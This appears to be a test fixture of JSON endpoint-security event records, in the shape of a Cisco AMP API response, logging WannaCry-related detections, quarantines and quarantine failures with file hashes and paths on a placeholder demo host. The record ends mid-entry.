-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":812000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031906","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":3200,"disposition":"Clean","file_name":"cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae","sha1":"ee8cbf12d87c4d388f09b4f69bed2e91682920b5","md5":"ad7b9c14083b52bc532fba5948342b98"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":235000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":2708,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":172000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031904","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419275394960064599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":423000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":377000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064596","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":33000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064605","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064607","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":891000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064604","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":876000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064603","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":845000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":798000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":767000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":751000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":735000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":423000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":6404,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":377000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
